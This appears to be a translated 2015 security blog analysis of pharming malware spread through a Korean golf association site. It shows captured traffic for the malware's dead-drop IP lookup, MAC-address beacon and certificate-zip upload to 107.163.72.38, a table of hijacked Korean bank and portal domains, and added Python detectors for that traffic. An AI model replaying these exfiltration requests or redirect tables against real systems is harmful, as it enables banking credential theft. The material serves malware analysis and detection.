
Pharming malware distributed via the Korea Amateur Golf Association (한국아마추어골프협회) website

nopsled 2015. 4. 19. 02:31



FileName: java.exe
MD5:      F92A5666EA36C16B839E87950E4D6ED9
SHA-1:    55C32079EC63BC4D1A9E8FD33BA829E463EAB0B2
Packer:   PECompact 2.0x Heuristic Mode -> Jeremy Collake

No exploit was found on the site, but the binary is being distributed from it.




GET /fcg-bin/cgi_get_portrait.fcg?uins=2835357196?=31241 HTTP/1.1
Accept: */*
Accept-Language: ko
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)
Host: users.qzone.qq.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: QZHTTP-2.37.1
Content-Encoding: gzip
Cache-Control: max-age=86400
Content-Type: text/html
Content-Length: 121
Date: Sat, 18 Apr 2015 16:36:34 GMT
Connection: keep-alive
Vary: Accept-Encoding

..........+./*)J.,qN..qJL...V2.065657.4S..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T240.343.37.3..J..j..|.O!|...

The pharming IP (107.163.72.38) is fetched from users.qzone.qq.com. The response body is gzip-compressed (Content-Encoding: gzip), which is why it prints as binary above; once decompressed it carries the server address. A legitimate QQ profile page is thus used as a dead-drop resolver, so the attacker can rotate the pharming server without redistributing the binary.
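How the dead-drop lookup works, as an added example that is not part of the original post: the malware fetches a QQ profile through cgi_get_portrait.fcg and reads the pharming server address out of a profile field. The post shows only the gzip-compressed response bytes, so the plaintext below is a constructed approximation of the portraitCallBack(...) JSONP that endpoint returns, with the IP placed in the nickname slot; the exact field layout is an assumption. The function gunzips the body, strips the JSONP wrapper and keeps only globally routable IPv4 literals, so a private, reserved or malformed value never becomes an IOC.

```python
import gzip
import ipaddress
import json
import re

# Constructed sample: the post shows only the gzip-compressed bytes of the
# users.qzone.qq.com response. The plaintext below is an ASSUMED approximation
# of the portraitCallBack(...) JSONP returned by cgi_get_portrait.fcg, with the
# pharming IP planted in the profile nickname field (index 6 here).
SAMPLE_PLAINTEXT = (
    'portraitCallBack({"2835357196":['
    '"http://qlogo4.store.qq.com/qzone/2835357196/2835357196/100",'
    '2835,-1,0,0,0,"107.163.72.38",0]})'
)
SAMPLE_GZIP_BODY = gzip.compress(SAMPLE_PLAINTEXT.encode("utf-8"))

_JSONP = re.compile(r"^\s*\w+\((.*)\)\s*;?\s*$", re.S)
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_body(body: bytes, content_encoding: str = "gzip") -> str:
    """Undo the Content-Encoding seen in the capture (gzip) and decode as text."""
    if content_encoding.lower() == "gzip":
        body = gzip.decompress(body)
    return body.decode("utf-8", errors="replace")


def strip_jsonp(text: str):
    """Return the parsed JSON payload inside callback(...)."""
    m = _JSONP.match(text)
    if not m:
        raise ValueError("not a JSONP response")
    return json.loads(m.group(1))


def _strings(obj):
    """Yield every string leaf in a parsed JSON structure, whatever its shape."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings(v)


def extract_dead_drop_ips(body: bytes, content_encoding: str = "gzip"):
    """Pull every globally routable IPv4 literal hidden in the profile response.

    Loopback, private, documentation ranges and junk such as 999.1.1.1 are
    dropped, so only an address the malware could actually contact is returned.
    """
    found = []
    for s in _strings(strip_jsonp(decode_body(body, content_encoding))):
        for cand in _IPV4.findall(s):
            try:
                ip = ipaddress.IPv4Address(cand)
            except ipaddress.AddressValueError:
                continue
            if ip.is_global and str(ip) not in found:
                found.append(str(ip))
    return found


if __name__ == "__main__":
    print(extract_dead_drop_ips(SAMPLE_GZIP_BODY))
```

Pointing the same function at a live capture means feeding it the raw response body plus the Content-Encoding header value; scanning every string leaf rather than one fixed index keeps it working if the attacker moves the address to a different profile field.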




Get /Count.asp?ver=001&mac=00-1C-42-55-3D-A4&31241 HTTP/1.1
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 180.150.226.26
Content-Length: 0
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Sat, 18 Apr 2015 16:36:18 GMT
Connection: Keep-Alive
Set-Cookie: KBMCAJDSSKPSSMJGHMGK=DWAXCMPXKCPLDBTMWENVHUKBITCGRAXLKRBIJZMR; path=/
Cache-control: private
Content-Type: text/html
Content-Length: 3

...

Infection registration: the victim's MAC address is reported to 180.150.226.26 via Count.asp. Note the WinHttp.WinHttpRequest.5 user-agent and zh-CN Accept-Language, unlike the browser-like user-agent and ko language of the other requests.







GET /ip.php?=6996 HTTP/1.1
Accept: */*
Accept-Language: ko
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)
Host: 107.163.72.38
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 16:36:32 GMT
Server: Apache/2.2.4 (Win32) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Content-Length: 32
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: ko

5b3412f55ff8ec4bd2a99b059084256d

POST /upload.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://107.163.72.38/upload.php
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314
Content-Length: 295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 107.163.72.38
Cache-Control: no-cache

-----------------------------7da3e1bd0314
Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\35c5c8545035186fd745d56e11d8692c.zip"
Content-Type: application/x-zip-compressed

PK....................
-----------------------------7da3e1bd0314--

HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 16:36:34 GMT
Server: Apache/2.2.4 (Win32) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Content-Length: 0
Content-Type: text/html;charset=utf-8
Content-Language: ko

As with every other pharming sample, the flow is the same: ip.php returns a 32-character hex value (the "IP hash"), and right after that the client POSTs a zip staged in %TEMP% (itself named with a 32-character hex value) to /upload.php on the same server. This is the certificate exfiltration. The Referer is set to the upload page itself and Accept-Language switches to zh-cn for this request.
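A detector for the two reporting steps above (the MAC beacon to Count.asp and the hashed-zip upload to upload.php), written as an added example rather than anything from the post or the malware. The sample requests are reconstructed from the captured headers with truncated bodies; the indicator names, the watched paths and the WinHttpRequest-to-bare-IP check are this example's own choices.

```python
import re

# Constructed sample requests, rebuilt from the headers shown in the post.
# Bodies are the truncated placeholders the capture shows ("PK..."); nothing
# here is a real certificate or archive.
BOUNDARY = "-" * 27 + "7da3e1bd0314"

BEACON = (
    "Get /Count.asp?ver=001&mac=00-1C-42-55-3D-A4&31241 HTTP/1.1\r\n"
    "Accept-Language: zh-CN\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: 180.150.226.26\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

UPLOAD = (
    "POST /upload.php HTTP/1.1\r\n"
    "Referer: http://107.163.72.38/upload.php\r\n"
    "Accept-Language: zh-cn\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
    "Host: 107.163.72.38\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_file1"; '
    'filename="C:\\DOCUME~1\\nopsled\\LOCALS~1\\Temp\\35c5c8545035186fd745d56e11d8692c.zip"\r\n'
    "Content-Type: application/x-zip-compressed\r\n"
    "\r\n"
    "PK...\r\n"
    f"--{BOUNDARY}--\r\n"
)

BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

_MAC = re.compile(r"(?:[0-9A-Fa-f]{2}-){5}[0-9A-Fa-f]{2}")
_HEX32 = re.compile(r"^[0-9a-f]{32}$")
_BARE_IP = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return method, target, headers, body


def multipart_files(headers, body):
    """Yield (filename, part content-type) for each file part of a multipart body."""
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not m:
        return
    for part in body.split("--" + m.group(1)):
        fn = re.search(r'filename="([^"]*)"', part)
        if not fn:
            continue
        pct = re.search(r"(?im)^Content-Type:\s*(\S+)", part)
        yield fn.group(1), (pct.group(1) if pct else "")


def detect(raw: str):
    """Return the indicator names matched by one request (empty list if clean)."""
    method, target, headers, body = parse_request(raw)
    path, _, query = target.partition("?")
    hits = []
    # (1) infection-count beacon: a MAC address leaves the host in the query string
    if path.lower().endswith("/count.asp") and _MAC.search(query):
        hits.append("mac-beacon")
    # WinHttpRequest COM client talking to a bare IP is a script, not a browser
    host = headers.get("host", "").split(":")[0]
    if "WinHttpRequest" in headers.get("user-agent", "") and _BARE_IP.fullmatch(host):
        hits.append("winhttp-to-bare-ip")
    # (2) certificate exfiltration: zip named with a 32-hex hash, staged in Temp
    if method.upper() == "POST" and path.lower().endswith("/upload.php"):
        for filename, ctype in multipart_files(headers, body):
            stem = filename.replace("\\", "/").rsplit("/", 1)[-1]
            name, _, ext = stem.rpartition(".")
            if ext.lower() == "zip" and _HEX32.match(name):
                hits.append("hashed-zip-upload")
            if "zip" in ctype.lower() and "Temp" in filename:
                hits.append("temp-zip-upload")
    return hits


if __name__ == "__main__":
    for req in (BEACON, UPLOAD, BENIGN):
        print(detect(req))
```

Run over a proxy log or a pcap's reassembled requests, the same function gives a per-request verdict; the multipart parser is deliberately minimal (no nested parts, no quoted boundaries with spaces) because the malware's Internet Explorer style upload needs nothing more.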





The primary and secondary DNS servers are also changed to 127.0.0.1, so the victim's own machine acts as its DNS server.




The server is an APM stack (Apache/2.2.4 (Win32) PHP/5.2.3, per the Server header above). As in other cases, connecting to it with a forged Host header brings up Naver.




"갛ㅈ"...? As in 강한 ("strong")... (joking...)

It probably just means there are 562 infected victims.





107.163.72.38 daum.net
107.163.72.38 www.daum.net
107.163.72.38 www.zum.com
107.163.72.38 openbank.cu.co.kr.kr
107.163.72.38 www.cu.co.kr.r
107.163.72.38 bank.cu.co.kr
107.163.72.38 www.cu.co.kr
107.163.72.38 cu.co.kr
107.163.72.38 www.busanbank.co.kr
107.163.72.38 busanbank.co.kr
107.163.72.38 www.busanbank.co.kr.kr
107.163.72.38 www.citibank.co.kr.kr
107.163.72.38 www.citibank.co.kr
107.163.72.38 citibank.co.kr
107.163.72.38 ctbank.co.kr
107.163.72.38 www.dgb.co.kr
107.163.72.38 dgb.co.kr
107.163.72.38 banking.dgb.co.kr
107.163.72.38 www.dgb.co.kr.r
107.163.72.38 www.knbnak.co.kr
107.163.72.38 www.knbank.co.kr.kr
107.163.72.38 www.knbeasy.com
107.163.72.38 kibs.knbank.co.kr
107.163.72.38 www.knbank.co.kr.r
107.163.72.38 www.suhyup-bank.com.kr
107.163.72.38 suhyup-bank.com
107.163.72.38 www.suhyup.co.kr
107.163.72.38 suhyup.co.kr
107.163.72.38 biz.suhyup-bank.co.kr
107.163.72.38 biz.suhyup-bank.com
107.163.72.38 www.sushyup.co.kr.r
107.163.72.38 www.kjbank.com.kr
107.163.72.38 www.kjbank.com
107.163.72.38 kjbank.com
107.163.72.38 smile.kjbank.com
107.163.72.38 jbbank.co.kr
107.163.72.38 www.jbbank.co.kr
107.163.72.38 ibs.jbbank.co.kr
107.163.72.38 www.jbbank.co.kr.r
107.163.72.38 www.kdb.co.kr.r
107.163.72.38 www.kdb.co.kr
107.163.72.38 kdb.co.kr
107.163.72.38 direct.kdb.co.kr
107.163.72.38 ib.scfirstbank.com
107.163.72.38 www.sc.co.kr
107.163.72.38 sc.co.kr
107.163.72.38 nate.com
107.163.72.38 www.nate.com
107.163.72.38 hanmail.net
107.163.72.38 www.hanmail.net
107.163.72.38 www.zum.com

svchost.exe takes on the DNS server role and redirects these sites to 107.163.72.38. Several entries in the table are misspelled (knbnak, sushyup, ctbank) or carry a doubled TLD (.co.kr.kr, .co.kr.r), and www.zum.com appears twice; the list is reproduced as found.
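A host-side triage of the redirect table and DNS settings described above, added here as an example and not the post's own code. The hosts excerpt is a constructed subset of the list in the post, the loopback DNS-server list stands in for what ipconfig /all would report on an infected machine, and WATCHED is an assumed brand list built from the domains shown. The checks flag many unrelated brands pinned to one public IP, doubled-TLD variants such as .co.kr.kr, near-miss spellings such as knbnak, duplicate entries, and DNS servers pointed at loopback.

```python
import difflib
import ipaddress
import re
from collections import defaultdict

# Constructed excerpt of the redirect table shown in the post (hosts-file
# format); the full list maps around fifty names to the same pharming server.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
107.163.72.38 daum.net
107.163.72.38 www.daum.net
107.163.72.38 bank.cu.co.kr
107.163.72.38 www.cu.co.kr.r
107.163.72.38 www.citibank.co.kr.kr
107.163.72.38 www.knbnak.co.kr
107.163.72.38 kibs.knbank.co.kr
107.163.72.38 www.zum.com
107.163.72.38 www.zum.com
"""

# Primary and secondary DNS as the post describes them after infection;
# constructed here, on a real host this comes from ipconfig /all or WMI.
SAMPLE_DNS_SERVERS = ["127.0.0.1", "127.0.0.1"]

# ASSUMED brand list for the example, built from domains that appear in the post.
WATCHED = ("daum.net", "cu.co.kr", "citibank.co.kr", "knbank.co.kr", "zum.com")
_DOUBLED_TLD = re.compile(r"\.(co\.kr|com|net)\.(kr|r)$")


def parse_hosts(text):
    """Return {ip: [names]} from hosts-file text, ignoring comments and blanks."""
    table = defaultdict(list)
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for n in names:
            table[ip].append(n.lower())
    return table


def classify(name):
    """watched / typo-variant / lookalike / other for one host name."""
    bare = name[4:] if name.startswith("www.") else name
    if any(bare == w or bare.endswith("." + w) for w in WATCHED):
        return "watched"
    if _DOUBLED_TLD.search(bare):
        return "typo-variant"
    # near-miss spelling of a watched brand (e.g. knbnak vs knbank)
    if difflib.get_close_matches(bare, WATCHED, n=1, cutoff=0.8):
        return "lookalike"
    return "other"


def triage(hosts_text, dns_servers):
    """Return a list of finding strings; empty means nothing suspicious."""
    findings = []
    if dns_servers and all(ipaddress.ip_address(s).is_loopback for s in dns_servers):
        findings.append("dns-servers-loopback")
    for ip, names in parse_hosts(hosts_text).items():
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_private:
            continue  # localhost and intranet pins are normal hosts-file content
        kinds = {n: classify(n) for n in set(names)}
        watched = [n for n, k in kinds.items() if k == "watched"]
        # several unrelated brands resolving to one public IP: a pharming sinkhole
        if len(watched) >= 3:
            findings.append(f"sinkhole:{ip}:{len(kinds)}")
        for n in sorted(kinds):
            if kinds[n] in ("typo-variant", "lookalike"):
                findings.append(f"{kinds[n]}:{n}")
        for n in sorted({n for n in names if names.count(n) > 1}):
            findings.append(f"duplicate:{n}")
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_HOSTS, SAMPLE_DNS_SERVERS):
        print(f)
```

On a live machine the same function can be fed the contents of %SystemRoot%\System32\drivers\etc\hosts and the DNS server list from ipconfig /all; when the malware answers DNS itself rather than editing the hosts file, the loopback finding is the one that survives.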
